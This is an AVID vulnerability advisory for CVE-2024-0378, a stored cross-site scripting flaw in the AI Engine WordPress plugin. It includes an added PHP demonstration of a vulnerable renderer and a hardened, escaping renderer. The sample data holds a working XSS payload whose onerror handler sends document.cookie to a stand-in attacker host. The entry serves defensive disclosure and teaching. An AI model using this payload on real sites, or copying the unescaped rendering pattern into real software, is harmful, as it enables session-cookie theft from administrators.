AVID-2026-R1352
Description
Vulnerability CVE-2024-0378
Details
The AI Engine: Chatbots, Generators, Assistants, GPT 4 and more! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the AI chat data when discussion tracking is enabled in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Reason for inclusion in AVID: CVE-2024-0378 describes a stored cross-site scripting vulnerability in the AI Engine WordPress plugin, which provides AI chat features. This plugin is a software component commonly used in AI-enabled web deployments and pipelines, making it a part of the software supply chain for general-purpose AI systems (AI features in websites, integrations, and tooling). The issue is a security vulnerability (XSS) with potential impact on integrity and confidentiality, and the report provides clear evidence (CVE ID, description, affected versions, and references).
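The bug class described above, illustrated as an added example that is not code from the AI Engine plugin or its changeset: a chat message sent by an unauthenticated visitor is stored as part of a tracked discussion and later rendered into an admin page with no output escaping. Every function, class and option name here is hypothetical, the stored record and the payload are constructed for the demonstration, and the WordPress escaping helpers are stubbed so the file runs under plain `php` outside WordPress.

```php
<?php
// Added example for CVE-2024-0378 (stored XSS via tracked chat data).
// Not the plugin's own code; names are hypothetical.

// Stand-ins for the WordPress escaping helpers so this runs outside WP.
// In a real plugin you would call the WordPress functions directly.
if ( ! function_exists( 'esc_html' ) ) {
    function esc_html( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );
    }
}
if ( ! function_exists( 'esc_attr' ) ) {
    function esc_attr( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );
    }
}

// Constructed sample record: one tracked discussion as it might sit in the
// database after an anonymous visitor used the public chatbot. The first
// message is the attacker-controlled payload; nothing validated it on input.
$discussion = [
    'id'       => 42,
    'messages' => [
        [ 'role' => 'user',
          'content' => '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">' ],
        [ 'role' => 'assistant',
          'content' => 'I cannot help with that.' ],
    ],
];

// VULNERABLE pattern: stored content is concatenated straight into the HTML
// that an administrator sees on the discussions screen. The browser executes
// the onerror handler in the admin's session.
function render_discussion_vulnerable( array $discussion ): string {
    $html = '<ul class="chat-discussion">';
    foreach ( $discussion['messages'] as $m ) {
        $html .= '<li class="' . $m['role'] . '">' . $m['content'] . '</li>';
    }
    return $html . '</ul>';
}

// HARDENED pattern: escape at output time with the WordPress helpers, and
// restrict the role to a known allow-list before using it in an attribute.
function render_discussion_safe( array $discussion ): string {
    $allowed_roles = [ 'user', 'assistant', 'system' ];
    $html = '<ul class="chat-discussion">';
    foreach ( $discussion['messages'] as $m ) {
        $role = in_array( $m['role'], $allowed_roles, true ) ? $m['role'] : 'unknown';
        $html .= '<li class="' . esc_attr( $role ) . '">' . esc_html( $m['content'] ) . '</li>';
    }
    return $html . '</ul>';
}

// Quick check you can run against any renderer: does the raw event handler
// survive into the output? It should never appear unescaped.
function contains_live_handler( string $html ): bool {
    return (bool) preg_match( '/<img[^>]*\sonerror=/i', $html );
}

echo "vulnerable renderer executes payload: "
    . ( contains_live_handler( render_discussion_vulnerable( $discussion ) ) ? 'yes' : 'no' ) . "\n";
echo "hardened renderer executes payload:   "
    . ( contains_live_handler( render_discussion_safe( $discussion ) ) ? 'yes' : 'no' ) . "\n";
echo render_discussion_safe( $discussion ) . "\n";
```

The point of the hardened version is that escaping happens where the data meets the HTML, not where it enters the system: a chatbot legitimately has to accept angle brackets and quotes in user text, so input sanitization alone would either break the product or miss an encoding the renderer later decodes. For deployments of this plugin, the practical check is the installed version (anything at or below 2.2.0 is affected) and, if discussion tracking was enabled while a vulnerable version was live, a review of the stored discussions for markup before an administrator opens them in the dashboard.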
References
- NVD entry
- https://www.wordfence.com/threat-intel/vulnerabilities/id/54344300-6288-40bc-b539-3dc9b555ed00?source=cve
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3043570%40ai-engine&new=3043570%40ai-engine&sfp_email=&sfph_mail=
Affected or Relevant Artifacts
- Developer: tigroumeow
- Deployer: tigroumeow
- Artifact Details:
| Type | Name |
|---|---|
| System | AI Engine |
Impact
AVID Taxonomy Categorization
- Risk domains: Security
- SEP subcategories: S0100: Software Vulnerability
- Lifecycle stages: L06: Deployment
CVSS
| Field | Value |
|---|---|
| Version | 3.1 |
| Vector String | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N |
| Base Score | 6.5 |
| Base Severity | 🟠 Medium |
Other information
- Report Type: Advisory
- Credits:
- Date Reported: 2024-03-02
- Version: 0.3.3
- AVID Entry